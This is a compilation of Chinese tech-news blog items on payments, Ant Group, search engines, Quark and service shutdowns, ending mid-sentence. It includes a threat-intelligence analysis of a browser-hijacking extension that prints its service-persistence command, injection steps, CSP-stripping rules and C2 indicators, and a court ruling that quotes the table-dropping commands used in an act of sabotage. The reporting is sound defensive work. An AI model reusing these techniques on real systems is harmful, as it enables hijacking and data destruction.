例如,消费者在使用微信钱包扫描静态条码支付时,单日使用零钱包支付的上限不超过500元,同时微信关联的所有银行卡还可以再独立获得500元的支付上限。 对于使用动态条码(如手机上实时生成的条码)进行支付的,风险防范能力根据交易验证方式不同分为A、B、C三级,同一客户单日累计交易限额分别为自主约定、5000元、1000元。 据央视财经 中国支付清算协会副秘书长亢林表示,我们日常使用的支付宝和微信,一般使用两个以上,比如说指纹、密码这两个以上的要素,单日限额是5000元。对消费者来讲,不会带来任何不便。 而对静态条码支付,也就是我们常见的商户贴在墙上或者打印好的二维码支付,无论采取什么交易验证方式,同一个客户单日累计交易金额都不能超过500元。 消费者街头扫码小额支付不受影响 条码支付规范自2018年4月1日起实施。 举例来说,新要求实施后,消费者在街头商贩扫静态条码小额支付不受影响,也不影响商贩收款。如果在饭店里吃了顿600元大餐,扫静态条码付款就有点困难了,不过可以让收银员扫消费者手机上生成的动态条码,这样其实更安全。 对于站长来说估计有些不方便了,比如网站设置的二维码都是静态码,限制500元的话根本不够用,平时转个帐什么的都要一千元的以上的,比如买个云服务器之类的都远超500了。 动态条码如下: 警方提醒: 一、要使用官方渠道APP扫码软件,不扫不明二维码; 二、仔细辨别真伪,核对信息,确认二维码安全有效; 三、对常见的二维码也应保持适度警惕,保管好自己的付款二维码; 四、手机上最好安装一些正规安全软件,增加手机安全系数,防止不法分子将病毒镶嵌在二维码里,盗取公民个人重要信息。 #### 央行同意支付宝中国变更为无实际控制人 意味着什么 根据最新的消息,中国人民银行已经同意支付宝(中国)网络技术有限公司变更为无实际控制人。这一决定意味着,马云不再对蚂蚁集团拥有实际控制权。 支付宝(中国)的实际控制人是杭州君澳股权投资合伙企业(有限合伙),这家公司有包括彭蕾、陆兆禧、戴珊、吴泳铭、张勇、王坚、井贤栋等在内的26位合伙人。然而,随着支付宝(中国)变更为无实际控制人,这些合伙人的权益并未发生变化,他们仍然是支付宝(中国)的股东。 此次变更的背后,是蚂蚁集团对其公司治理的进一步完善。蚂蚁集团将成为无实际控制人公司:从马云及其一致行动人共同行使股份表决权,改变为包括蚂蚁集团管理层、员工代表和创始人在内的10名自然人分别独立行使股份表决权;调整后,蚂蚁集团各主要股东彼此独立行使股份表决权且无一致行动关系,不再存在任何直接或间接股东单一或共同控制蚂蚁集团的情形。 这一变更对于蚂蚁集团来说,是实现高效透明公司治理的关键节点。同时,这也反映出中国金融监管部门对于互联网金融行业的审慎态度,强调公司治理的重要性,以保护公众利益和金融稳定。 #### 央行:将大力打击虚拟货币交易 11月22日 消息:今日,央行上海总部发文称将加大监管防控力度,打击虚拟货币交易。 央行称,在区块链技术推广宣传过程中,虚拟货币炒作有抬头迹象。为进一步加大防控力度,上海市金融稳定联席会议办公室、人民银行上海总部联合上海市区两级各相关部门,对上海地区虚拟货币相关活动开展专项整治,责令在摸排中发现的为注册在境外的虚拟货币交易平台提供宣传、引流等服务的问题企业立即整改退出。 下一步,上海市金融稳定联席会议办公室、人民银行上海总部将继续对辖内虚拟货币业务活动进行持续监测,一经发现立即处置,打早打小,防患于未然。广大投资者应注意不要将区块链技术和虚拟货币混同,虚拟货币发行融资与交易存在多重风险,包括虚假资产风险、经营失败风险、投资炒作风险等,投资者应增强风险防范意识,谨防上当受骗。 #### 央视海外CDN采购:腾讯云、网宿、金山云入围 10月15日,央视国际网络有限公司2018年度海外传输覆盖项目-海外CDN网络覆盖项目中标公告发布中标公示,入围供应商三家: 腾讯云、网宿科技、金山云三家入围,价格分别为:509万元、460万元、981万元。 8月30日,央视国际网络有限公司发布《2018年度海外传输覆盖项目-海外CDN网络覆盖项目》公开招标公告,预算金额为1300万元。 #### 央视点评:严惩视觉中国 切掉知识产权毒瘤 一个宇宙黑洞牵扯出一个行业“黑洞”,最近视觉中国登上了新闻头条,引发网友热议。 4 月 13 日,在央视网播出的晚间新闻栏目中,使用了“严惩视觉中国,切掉知识产权市场的毒瘤”的标题来报道。 央视报道称,视觉中国以“能奈我何”的嘴脸,把法务做成销售,一头侵犯原创者的合法权益,一头又对使用者进行“维权敲诈”。 央视评论称,严惩视觉中国很有必要,严防下一个视觉中国更有必要,健康良性的版权市场,必然是激励原创者创作热情的市场,必然是不给视觉中国们任何生存机会的市场。 在此之前, 4 月 12 日,视觉中国致歉,表示接受广大网民和媒体的监督批评,全面配合监管部门彻底积极整改。 视觉中国称,“目前,公司已采取措施对不合规图片全部下线处理,并根据相关法律法规自愿关闭网站开展整改,进一步强化企业自律,强化制度建设,提升内容审核的质量,避免类似情况再次发生。再次感谢广大网民和媒体的监督,公司将汲取教训认真整改,自愿接受天津市互联网信息办公室依法依规对我公司的处理。” #### 头条号认证收费啦! 在互联网做自媒体的人士肯定对今日头条有所熟知,对头条号的认证也多少会遇到。不过之前认证都是免费的,现在用户数多了,平台开始收费了...(悲剧吧) 起初微信新版公众平台做出调整,就收取 300/次认证费引起了不少人的争议。不过按照微信的说法,申请微信认证需支付300元/次的审核服务费用,是用户基于腾讯提供的资质审核服务而支付的一次性费用;此举措有利于提升微信服务号整体的准入门槛和服务质量。总之,300元的收费新规利大于弊! 类似和公众号一样,公众号最早用微博就可以免费认证,现在也成收费的了。如今,头条也好像是步入微信的后尘,积累一定的用户数,下一步需要收取认证费了... 一般来说,认证的效果等于微博红人认证,官方通过审核后,专业度和信任度将会大大提高,内容也会被优先推荐观看。 对此,收费后的头条认证,网友是怎么看的呢? 有网友表示:就知道头条号迟早会这么干,果不其然开始认证收费了 ;也有网友表示:有免费号供你用,可你愿意选择更好品质的企业号,收取服务费也正常。换我我也会收... 最后,欢迎大家留言评论自己的看法。 #### 头条搜索也失败了,旗下“悟空搜索”改名“小悟空” 专注提供AI工具 9月12日 消息:字节跳动旗下“悟空搜索”应用现已改名为“小悟空”,专注于提供AI工具。 据介绍,“小悟空”提供20余个分类和200多个工具,满足用户的工作、生活和娱乐需求。该应用还具有智能对话功能,可以解决用户遇到的问题并进行辅助推荐。 同时,这些智能工具可帮助用户进行翻译、法律咨询、趣味测试等操作,还可以提供创作灵感、学习资源和职业建议等。 在更名之前,“悟空搜索”是一款包含清爽浏览和各种专业资讯等功能的搜索引擎,致力于给用户带来全新的浏览体验,用户可以快速获取各类专业知识、生活技巧、体育财经、新闻信息等。 看来搜索并不好做啊,估计争不过百度。 #### 夸克 PC 版 Windows 浏览器上线啦,集合浏览器搜索、网盘、工具等功能 夸克浏览器 PC 版功能介绍 夸克浏览器 PC 版已正式登陆 Windows 平台,并提供多种实用功能。这一浏览器版本号为 1.0.5.9,并且安装包大小为 185 MB,它是基于 Chromium 112 内核版本打造的,旨在为用户提供一个简化和集成多服务的浏览体验。目前的版本功能相对简单,但夸克浏览器的特点在于其左侧边栏装有网盘和工具,这些作为一级入口并列在浏览器搜索旁边,给用户提供便捷的访问方式。 特点与用户体验 夸克浏览器 PC 版在设计上与常规 PC 浏览器有所区别。它的左侧边栏将网盘、工具作为一级菜单显示,这与搜索功能一样重要,使得用户可以迅速切换至不同的功能模块。为了使用特定功能,如夸克网盘和夸克扫描王,用户需要使用手机版扫码登录。这种设计可能增加了一些使用的门槛,但对于已经使用夸克手机应用的用户来说,可利用性和便捷性显著提高。 与其他浏览器的对比 夸克浏览器 PC 版与其他浏览器的主要区别在于其集成了网盘服务和一系列小工具。虽然它仍基于业界广泛使用的 Chromium 内核,但通过将搜索、网盘和工具功能并列,夸克为用户提供一个更为集成化的工作环境。 集成网盘功能 夸克浏览器的一个显著特点是其集成网盘功能。与传统的浏览器相比,这使得用户在不需要额外安装应用程序的情况下,便能享受到存储和共享文件的便利性。 #### 夸克/神马/UC浏览器搜索移动网站优化指南 1. 本文目的 夸克搜索、UC浏览器搜索,本质上用的都是神马搜索。因此,神马搜索在国内移动搜索比重中,占有非常大的市场,作为站长,一定要做好神马搜索的优化。本文提供神马搜索在网站收录、优化上的官方说法,帮助站长合理、持续的优化网站,共同促进移动搜索的发展。 2. 为何要建移动站 移动互联网井喷式发展,用户访问移动资源的需求越来越强,目前用户访问移动互联网的时间已经超过了PC。建立移动站,获取更多移动访问流量是网站发展必然趋势。 3. 移动站优化 1) 网站域名 建议选择简短、有含义的域名,方便用户记住。 2) 网站结构组织 网站的结构设置尽可能扁平,方便用户在较短路径能访问到想要的网页。同时,扁平的网站结构也更利于搜索引擎更全面的抓取到网页。我们建议网站采用三层结构模式:网站首页->频道首页->具体内容页,每个页面都有指向上级及下级相关页面的链接。此外,建议在页面中设置面包屑,方便用户定位和浏览网页。 3) URL设置 url尽可能规范、简单,不要带过多的无效参数,如session id,统计参数等。如因为统计等其它因素需要设置较复杂的动态url,建议用户访问时将url通过302重定向到正常的静态url。另外,在网站内容组织上通过目录或二级域名来区分不同主题内容,也能在一定程度上提高url可读性。 4) 服务质量 网站务必保证文档的服务和较快的访问速度,这个是基本要求,只有保证了服务质量才能留住用户。另外,服务稳定也有利于搜索引擎及时抓取和索引网站内容。 5) 内容质量 网站最好有自己的原创内容,能够给用户提供独特的价值。除此之外,在建设网站内容时要严格从用户的利益出发,不要针对搜索引擎制造内容,不要做spam! 6) 善用标签 善用html内的标签,如title、meta-description内容要准确、清晰。Title设置建议包含网站内容、主站和频道信息,如:德国24年后再捧大力神杯_体育频道_新浪网;meta-description需要准确描述网页或频道内容,利于搜索引擎展现更相关和更具可读性的摘要,这点在doc类网站中体现尤为明显。 7) 移动适配 网站最好能适配高端机型和低端机型,保证在不同机器上能有适合的展现形态。如,网站a(www.abc.com),适配到高端机为:m.abc.com,适配到低端机为:wap.abc.com。从发展趋势来看,建议用html5和xhtml来建站,根据不同平台进行自动适配。 8) 开放抓取 对正常的网页放开robots.txt限制,允许搜索引擎抓取。神马搜索的爬虫user agent是yisouspider,神马搜索抓取了网站内容才能在用户检索时提供相关的网页内容。 #### 夸克PC端AI全面升级 整合AI搜索、AI创作、AI总结等能力 阿里巴巴集团旗下的智能信息事业群夸克于8月27日发布了全新升级的PC端应用,该版本全面升级了AI搜索、AI写作、AI PPT、AI文件总结等关键功能。 夸克PC端的AI搜索功能在App端推出后,现已同步至PC端,并配备了更强大的模型能力,实现了更快的交互速度。夸克AI在首字出现速度和吐字速度上大幅领先行业标准,能够迅速提供精准答案。此外,三栏式界面设计使得图文、视频等信息展现更为清晰,使用户能够一眼获取核心信息。 在写作方面,夸克PC端能够满足包括大学生、白领在内的高频用户需求,支持近200种类型的文稿撰写,能在半分钟内快速产出高质量文章。同时,夸克还提供了多种撰写PPT的方式,包括智能生成大纲、筛选模板编辑内容,以及Word文档一键转换为PPT的功能。 夸克PC端的“系统级全场景AI”能力,允许用户在Windows电脑或苹果电脑上通过快捷键快速调用AI功能,实现搜索、解读、翻译和润色等操作。此外,夸克还提供了官方插件,使用户能够在浏览器中使用AI回答、AI写作、解读、翻译以及网页总结等功能。 #### 夸克也出AI搜索了 夸克智能信息事业群在7月10日宣布,升级了其“超级搜索框”,推出了以AI搜索为核心的一站式AI服务。 夸克7.0版的AI搜索框能够理解用户意图,聚合全网优质内容,提供图文、视频等多种形式的精准、直接、高效的信息。它特别擅长处理复杂逻辑分析和跨学科知识,为用户提供准确且丰富的结果。此外,夸克AI搜索还能满足用户在各种主题、题材、篇幅下的高频写作创作需求,如文案、文档、PPT和简历制作等。 在智能总结方面,夸克能在数秒内整理出长篇文章的摘要,支持长达5小时视频的字幕导出、分段总结、整体总结、生成脑图和抽取课件PPT等功能,大幅提升了工作和学习效率。 夸克还升级了高考AI搜索服务,提升了个性化志愿推荐的精准度。在6月高考季,夸克高考AI搜索的使用量超过了1亿次。夸克产品负责人郑嗣寿表示,夸克始终坚持在搜索上的价值探索,不断从搜索框中生长出新内容和新工具。 夸克7.0版不仅提供“超级搜索框”,还提供网盘、扫描、文档、CueMe、学习助手、健康助手等智能工具和内容产品,满足用户从检索到分享的全方位需求。 #### 奇安信(360)网站卫士今日正式下线 就在今天,奇安信网站卫士正式下线了,这款上线十几年的网站安全CDN服务正式告别站长,也宣告着中国互联网的一个时间过去了。 奇安信网站卫士原名360网站卫士,是360公司开发的一款专业网站安全防御的产品,于2012年05月上线,曾非常受站长欢迎,因为其号称永久免费,不仅解决了网站加速问题,还为广大站长提供了DDOS防御,是360推出的一款非常有良心的产品。 事实上,直到360网站卫士下线,这款产品一直都是供站长们免费使用。 百度也推荐了百度云加速,不过也是今年关闭了免费服务,如今新出了百度云防护,不过这款产品已经成了收费产品了,免费时代结束了。 #### 奇安信:安卓恶意软件 Wpeeper利用遭入侵 WordPress 网站隐藏黑客真实服务器 安全公司奇安信日前发布新闻稿,揭露了一款名为 Wpeeper 的安卓木马,黑客将相关木马隐藏在各种应用中,并上传至 Uptodown App Store 等第三方市场中,一旦不知情的用户下载安装,黑客便能够在受害者的手机上远程执行代码。 这款木马最大的特性在于黑客利用受到入侵的 WordPress 网站建立 C2 结构,试图隐藏真正的黑客服务器所在位置。此外黑客还通过 HTTPS 加密通讯协议来保护攻击流量。同时通过 AES 算法处理黑客发出的远程代码指令。 值得留意的是,虽然黑客仅仅利用 Wpeeper 木马进行了为期不到一周的攻击行动就“戛然而止”,不过奇安信认为相关黑客很可能在策划更大规模的攻击行动,之所以暂停攻击的原因是为了“欺骗杀毒软件所使用的机器学习模型”,让他们的恶意木马更难被发现。 #### 奇安信:超百万终端感染“幽灵插件”,黑客可操控搜索结果 背景   奇安信威胁情报中心在终端侧运营过程中发现了一个规模巨大并且能够劫持受害者 Google 搜索内容和劫持电商链接等恶意行为的境外黑客团伙,基于 PDNS 数据发现该团伙从 2021 年开始活跃,并且恶意域名在 OPENDNS 的 top 1m 列表中,全球受影响的终端至少百万级别。 URL活跃时间overbridgenet.com/jsv2/offer_combo_v62021-05-10至2023-04-15overbridgenet.com/jsv8/offer2023-05-24至今   相关域名在国内的访问量也很大:   我们在浏览器中找到了一个恶意插件,并将其命名为“幽灵插件”。   攻击者绕过了 Google CSP 机制,当使用 Google 搜索时会向页面中注入 js,注入前截图如下:   注入后结果如下:   Google 搜索页面加载了额外的 js,额外在顶部展示出攻击者推送的结果,除了控制搜索结果外,受害者访问任意页面时都会注入另一段 js,用来追踪受害者访问习惯和轨迹,当受害者访问电商类型的网站时恶意 js 会从 overbridgenet.com/jsv8/offer 获取到一个新的域名用来劫持当前页面中的跳转链接。   overbridgenet.com 解析的IP为 5.223.52.27,该 IP 下存在多个可疑域名,访问量都很大。   基于 VT 数据可以看到大量 URL,URL 的字段与上述拼接的字段一致,只是顺序有所不同,所以这些 URL 是恶意 js 拼接后的劫持链接,观察到被劫持的 URL 存在一些 web 登录页面。   目前劫持链接只有跳转功能,劫持逻辑由攻击者在云端控制,理论上可以定制化劫持特定的网站,甚至可以进行中间人劫持获取登录页面的账密。   影响范围   基于 PDNS 数据,我们对受到到恶意插件影响的国内受害者进行了统计:   当 Google 搜索结果被劫持时会访问 svdred.com 和 xerogala.com,那么可以统计实际被成功劫持的国内受害情况:   技术细节   如此大规模的受害程度,攻击路径可能不止一个,基于终端数据我们观察到该恶意插件隐藏在破解安装包中,如下:   攻击者将类似这种伪造的安装包上传到一些破解软件的下载站,等待受害者下载,受害者点击后会在 C:UsersPublicdata 下释放一系列恶意组件。   其中的一部分组件首先会被释放到 C:WindowsSystem32 文件夹下。   之后由 mdwslp 完成这些组件从 WindowsSystem32 到 UsersPublicdata 的过渡。   释放完毕后会执行 sc create XblGame binPath="C:UsersPublicdatamdwslp.exe" start= auto 命令,将 mdwslp 组件注册为服务,然后启动该服务。   mdwslp.exe   该组件负责整个恶意 web 插件的初始化,首先会判断相关组件是否存在来确定是否已初始化完成。   将 WindowsSystem32data1.zip 解压到 Publicdataext。   该部分为恶意 web 插件的 js 代码。   之后会循环检测是否存在 Publicdatauptimecrx.exe,不存在就从 WindowsSystem32uptimecrx.dat 拷贝。   拷贝之后会使用 微软官方签名工具 signtool.exe 对其进行签名。   具体的签名攻击者自己创建的。   最后将 uptimecrx.exe 注册为另一个服务 XblGame2 并启动。   uptimecrx.exe 的签名每 10 小时更新一次。   检测标志文件 Publicdataup1.dat 是否存在,如果存在则表示自身需要更新,退出循环,该组件的更新由 uptimecrx.exe 完成。   除此之外,该组件还会循环检测恶意 DLL 是否注入到目标进程。   如果没检测到就会调用注入工具进行注入。   该工具为之前释放的 WindowsSystem32datax.dat,调用时会为其随机设置一个新文件名并拷贝到 AppDataLocalTempxtdbf 文件夹下。   之后以 --install/--uploaddll 等参数启动该工具。   uptimecrx.exe   该组件用于更新和持久化 mdwslp.exe,循环检测 mdwslp.exe 是否存在,如果不存在则从 WindowsSystem32mi_nt_svc.dat 拷贝,并重新注册服务并启动。   检测 mdwslp.exe 注册的服务 XblGame 是否已停止,如果停止则重新启动。   通过标志文件 Publicdataup1.dat 检测 mdwslp.exe 是否需要更新,仍然通过拷贝 WindowsSystem32mi_nt_svc.dat 进行更新并对其重新签名,更新完毕后注册并启动服务。   datax.dat   该组件为 DLL 注入工具,其主要功能为将恶意的 ntdb.dll 注入到目标进程中。   根据参数的不同,注入的目标进程如下所示:   --install:注入到 explorer 进程;   --browser_chrome:注入到 chrome 进程;   --browser_msedge:注入到 msedge 进程;   --uploaddll:从 WindowsSystem32ntdb.dat 处获取新的载荷 DLL,并重新签名。   ntdb.dll   该组件用于加载恶意 web 插件,首先判断自身是否在 explorer.exe、chrome.exe、msedge.exe进程中,如果不是则结束运行。   如果其在 chrome.exe 或 msedge.exe 中,hook 相关 dll 中的 ChromeMain 函数。   以及 hook 相关事件函数。   如果在 explorer.exe 进程中,则会以 --load-extension 等参数启动浏览器,用于加载恶意 web 插件。   恶意插件路径指定为 UsersPublicdataext。   启动完毕后会将自身注入到浏览器进程。   Ext(浏览器插件)   如果恶意插件加载成功,浏览器扩展栏会显示一个空白页面。   详细信息如下:   manifest.json   定义相关 js 的作用范围,service_worker.js 为后台服务工作进程:   content_script.js 会在 url 匹配到搜索引擎相关时被加载:   disabled-trusted-types.js 在任何时候被加载;   之后定义了一些杂项,包括版本信息,更新链接等。   content_script.js   获取当前 uuid 传递给 web_accessible_resource.js 并加载。   web_accessible_resource.js   首先进行简单 url 检测,检测成功后会向 calnor.info 请求 js 并注入到当前页面。   根据 manifest.json 中的规则,访问 Google 搜索时会加载该 js,可以看到 calnor.info 返回的 js 已经出现在网页源码中。   disabled-trusted-types.js   关闭浏览器的 XSS 防御策略。   service_worker.js   该 js 为后台服务进程,在扩展被启动时运行,首先会注册一个安装事件监听器,当该扩展被首次安装时执行。   首先从 klymos.info 获取一个 uuid:trackInstall。   注册客户端 ID,向 dash.zintrack.com 发送该事件的消息:sendApiRequest。该域名是 Google Analytics 的轻量级替代,攻击者注册了自己的 api key 用来统计受害者。   设置该扩展被卸载时接收消息的域名 dash.zintrack.com:setUninstallURL。之后会设置一个定时器,每过一段时间进行规则更新。   规则仍然从 klymos.info 获取,并将获取到的规则应用到该扩展的网络请求拦截中。   获取到的规则如下,其功能是对部分搜索网站的网络请求中移除掉 content-security-policy、X-Xss-Protection 等安全策略。   注册定时器 update-rc 用于获取远程代码。   fetchRemoteCode 用于从 infird.com 获取 js 代码。   注册选项卡更新事件,每当用户创建了新的浏览器选项卡时,将获取到的远程 js 代码加载到当前页面,如果当前页面 url 在 blacklist 中则不加载。   当用户访问任何不在 blacklist 中的网页时,该 js 被加载到网页源码中。   最后会生成一个 page_view 事件,用于指示受害者已经加载了 service_worker.js。   这些信息会被发送到 Google 的网络分析服务网站 www.google-analytics.com,攻击者在该网站注册了自己的 API,可能是用于统计受害者。   remote code.js   该 js 是从 infird.com 获取的远程 js 文件,会在用户打开新网页(新增选项卡)时加载,其恶意逻辑通过攻击者设置的几个限时 cookie 进行控制。   首先会对当前页面 url 进行严格过滤,对于大部分的色情网站、社交媒体、搜索引擎等会停止执行。   url 中如果存在以下字段也会停止执行,可以看出攻击者在避免高访问量的场景,可能是用于隐藏自身。   如果通过了过滤,会设置一个定时器,每 20000 ms 执行相应操作。   进行初始化阶段,检测相应 cookie 项是否存在,如果存在则停止执行并清除定时器。   其中 Lda_aKUr6BGRn 是用于攻击者进行重定向的网址,当他为空时,会从 overbridgenet.com 获取一个新网址进行填充。   overbridgenet.com 会返回一个 json 文件,其中 at 项用来填充 Lda_aKUr6BGRn,在实际调试中该页面仅返回 {"s":1,"n":1} 格式的 json 文件,攻击者可能会筛选目标后才会在特定时间填充 at 项进行攻击。   如果 n = 1,perf_dv6Tr4n 项会被创建并填充为 1,json 中的 c 项为 cookie 过期时间,用于控制该 js 文件是否继续执行 (在初始化阶段时 perf_dv6Tr4n = 1 就返回)。   由于实际调试时 json 文件没有 c 项,该 cookie 不会过期。   如果 Lda_aKUr6BGRn 项被填充,则进入下一阶段过滤:   1、当前 url 为指定电商网站且 Ac_aqK8DtrDL 为空。   执行链接替换操作。   首先会创建一个点击事件监听器,当用户在该页面点击了带有指定标签的元素时,劫持用户跳转并将用户重定向到攻击者指定的链接。   新链接由 Lda_aKUr6BGRn 拼接得来,新链接可能用于攻击者进行钓鱼。   2、当前 url 不是电商网站且 Lda_aKUr6BGRn 不为空以及 Ac_aqK8DtrDL 为空。   将整个页面劫持到攻击者的链接,设置 Ac_aqK8DtrDL 为 1,Ac_aqK8DtrDS 用于计数。   3、Ac_aqK8DtrDL 不为空 Fm_kZf8ZQvmX 为空   创建一个新 iframe,将 src 项设置为攻击者的链接,设置其样式并将其插入到当前页面内容中,最后设置 Fm_kZf8ZQvmX 为 1。   calnor.js   该 js 是从 calnor.info 处获取的 js 代码,用于攻击者拦截相关 manifest.json 规则中的网页并将其注入。   其主要针对 Google 等搜索引擎,攻击者可以替换用户搜索页面的内容,首先会检测当前页面是否存在攻击者设置过的标签 mdorkirgneorpowtn。   如果存在则向 svdred.com 发送相关标签数据,不存在则发送 global。   同样的,检测页面是否包含另一些元素,并向 svdred.com 发送元素对应数据,这些元素在正常的 Google 搜索页面上并不存在,是由攻击者进行设置的,对其进行检测用于去除重复执行。   对于该 js,执行后会在当前页面插入元素 mdorkirgneorpowtn。   对于以上所有元素,检测到之后会终止执行,用于避免不同的组件互相影响。   通过检测之后,首先设置 mdorkirgneorpowtn 值为 a=4001&u=0106-20250304-ORG。   攻击者会避免在一些搜索模式中执行该组件,如用户搜索图片和购物等,仅根据搜索内容区分并向 xerogala.com 发送不同类型的信息,然后终止执行。   之后会向页面 head 中添加一个名为 referrer 的 meta 元素。   之后进入替换逻辑,首先获取搜索内容,创建一个新 style 元素并设置样式。   根据获取的搜索内容拼接 url 请求,发送到 xerogala.com 并获取返回数据。   将返回数据处理后,填充到元素 sadsfs 中,插入到当前页面。   其功能是在搜索页面的开头处插入攻击者替换的搜索结果,如下是受害者进行搜索后的效果,可以看到最开头的几个搜索结果被替换。   正常用户的搜索结果中不包含最开始的内容。   通过调试页面可以看到攻击者插入的内容正是 sadsfs 元素,其大多数情况下是广告内容。   总结   目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。   IOC C2:   calnor.info klymos.info infird.com overbridgenet.com infirc.com xerogala.com svdred.com cachedclr.com MD5:   40210f065e82d06b364f56c9ab4efdcd a4aa475e2309f05ac83d8289b4604cbd   1c6271c9bd6281b06965ca780b292e65   ebee140bdb9f1f80597cdea66860e1b6 #### 女微商自称“阿里离职女高管” 从不过情人节被打假 今年情人节之际一篇微商推销文突然火了,文中女主自称“阿里离职女高管”出来创业,还与马云等名人合影,最后的最后来个推销自己的微商创业项目——面膜,称此面膜具有神奇功效但根本查询不到,更主要的是其身份惨遭众阿里员工打假:早就被公司裁掉了!失策! 这要从朋友圈这两天突然大火的《那个从阿里离职的漂亮女高管,从来不过情人节》一文说起,作者称2017年从待了10年的阿里离职,离职损失保守估计至少1000万。还以“阿里高管”自称,为了证明自己在阿里的高管身份,她晒出了跟在马云身后参加活动的照片,在照片上,马云正与身边的人交谈,她则跟在后方,看起来很像贴身工作人员。她还晒出了和各种名人包括世界小姐张梓琳等的合照。   文中讲述自己的悲惨遭遇,试图改变行业乱象,萌生做一款护肤产品,为此称还请教了她的前老板马云,马云回复8个字:坚持初心,勇敢去做。后文就开始肆无忌惮的推销起自己的“创业项目”——面膜了。 不过,被打假了! 1、“如果她的职位是高管,那公司里起码有上万高管了”。一位阿里资深员工一语道破。当然,此身份也被阿里多个员工拆穿:“她的确曾在阿里就职,不过却并非什么高管,公司本来是末位淘汰制,但没干出成绩,在三、四年前公司调整时就被裁掉了。”说白了,不是自己想走的,而是被裁掉的…… 2、该公司本身并不具备生产化妆品的资质。面膜生产厂家是广州市绿色春天化妆品科技研发有限公司,这是一家独立的日化工厂,恩!面膜也是贴牌的!典型的微商套路! 3、至于上面的照片一位阿里高管在社交网络表示,“第一张合影我在场,是在北京参加一个外部会议,我工作以来第一次见到一个员工带着一个摄影师来跟拍自己,专门往几个高管身边凑,就为拍照。”且据说她并非该会议的工作人员。 蚂蚁金服副总裁陈亮回怼离职“女高管”:吹牛要有个度吧 估计看到这,这位“女高管”已经哭晕在厕所了吧,吹牛吹过头了,只怪营销文太火了,惊动各位大佬了…… 各位自媒体人虽然平时吹牛是正常操作,但别吹过头哈! #### 女程序员删除网上数据导致瘫痪 6 个小时被判刑 杨某,女,1986年出生于河北省邯郸市,汉族,专科文化,原万合集团邯郸客运总站售票系统计算机编程工作人员。 杨某2012年至2020年8月一直负责万合集团邯郸客运总站的网上及自助售票系统的开发维护工作,后因薪酬等问题离职,随心生不满。 2020年10月16日17时许,杨某利用自己的苹果笔记本电脑远程进入了万合集团邯郸客运总站的网上自助售票系统的接口地址,在输入了drop saleticket、drop printtotal、drop depot等命令后,删除了售票员表、网络售票表、结算单表、售票数据表、手持机表,造成10月16日17时20分至10月16日22时30分,邯郸客运总站所有售票渠道全部无法正常使用,当日部分售票数据丢失。 2020年10月17日早上6时许,杨某再次使用其苹果手机进入了万合集团邯郸客运总站的售票系统,删除了售票员表、售票数据表、手持机表,造成10月17日6时50分至7时30分邯郸客运总站所有售票渠道全部无法正常使用,当日部分售票数据丢失。 公诉机关要求依据《中华人民共和国刑法》第二百八十六条之规定,以破坏计算机信息系统罪对杨某进行惩处,建议判处有期徒刑九个月。 法院认为,杨某违反国家规定,侵入万合集团邯郸客运总站网上及自助售票系统,对计算机信息系统功能进行删除,造成计算机信息系统不能正常运行,后果严重,其行为已构成破坏计算机信息系统罪。公诉机关指控的犯罪事实成立,法院予以支持。 杨某能够如实供述自己的罪行,自愿认罪认罚,且已取得被害单位谅解,依法可以从轻处罚,杨某辩护人提出的上述辩护意见,予以采纳。 依照《中华人民共和国刑法》第二百八十六条、第六十七条第三款之规定,判决如下: 杨某犯破坏计算机信息系统罪,判处有期徒刑九个月。 判决日期:二〇二一年七月一日 附相关法律条文: 《中华人民共和国刑法》 第二百八十六条违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。 单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照第一款的规定处罚。 第六十七条犯罪以后自动投案,如实供述自己的罪行的,是自首。对于自首的犯罪分子,可以从轻或者减轻处罚。其中,犯罪较轻的,可以免除处罚。 被采取强制措施的犯罪嫌疑人、被告人和正在服刑的罪犯,如实供述司法机关还未掌握的本人其他罪行的,以自首论。 犯罪嫌疑人虽不具有前两款规定的自首情节,但是如实供述自己罪行的,可以从轻处罚;因其如实供述自己罪行,避免特别严重后果发生的,可以减轻处罚。 #### 奶牛快传1月10日停服,所有功能停止,数据开始清除 事件聚焦:又一款“良心”工具落幕,用户数据进入清除倒计时 停服时间:2026年1月10日0时(仅剩最后72小时)影响范围:所有奶牛快传用户(个人、团队、企业账户)核心风险:服务器数据将被永久清除,未备份文件将无法找回历史背景:该服务曾于2025年11月宣布12月8日停服,后因并购意向短暂延续,最终仍难逃关停命运 一、事件深度解读:不只是“又一个App关闭” 时间线还原:从并购希望到最终落幕 2025年11月:首次宣布将于12月8日停止服务 2025年12月9日:123云盘宣布与奶牛快传达成战略并购意向 → 服务暂缓关停 2026年1月7日:最终公告,1月10日正式停服 2026年1月10日0时:所有功能停止,数据开始清除 关键转折:尽管有并购意向作为缓冲,但“未能就延续服务达成一致”意味着商业模式或技术整合的根本性问题未能解决。这提醒我们:并购意向不等于服务保障。 奶牛快传的技术定位与安全承诺 创立于2016年,奶牛快传核心卖点直击传统网盘痛点: 无速度限制:上传下载均不限速,对比某度网盘的限速策略 免登录下载:生成链接+取件码即可分享,降低使用门槛 大文件专精:专注于单文件最大支持到?GB(未明确但远高于普通网盘) 安全宣称:长期标榜“安全稳定”的传输环境 讽刺的现实:标榜“安全稳定”的服务,其自身的“生存安全”却无法保证。这正是所有依赖第三方SaaS服务的企业必须面对的供应商风险。 二、安全警报:72小时数据抢救倒计时 必须立即执行的“数据抢救清单” 第一步:优先级分级备份(立即开始) # 心理清单构建(即使没有命令行,也要有明确策略) 最高优先级(1月8日前必须完成): □ 客户合同与法律文件 □ 财务数据与票据 □ 项目源代码与设计原稿 □ 未公开的研究报告 中等优先级(1月9日前完成): □ 团队协作的中间文件 □ 历史项目归档资料 □ 培训材料与文档 可放弃数据(如时间不足): □ 临时传输的测试文件 □ 已有本地备份的重复文件 □ 过时无效的旧版本文件 第二步:验证备份完整性 下载后立即检查: 1. 文件大小是否与原始一致 2. 压缩包能否正常解压 3. 关键文档能否正常打开 4. 敏感文件是否已加密存储(如需) 推荐工具:使用checksum验证 # Windows: 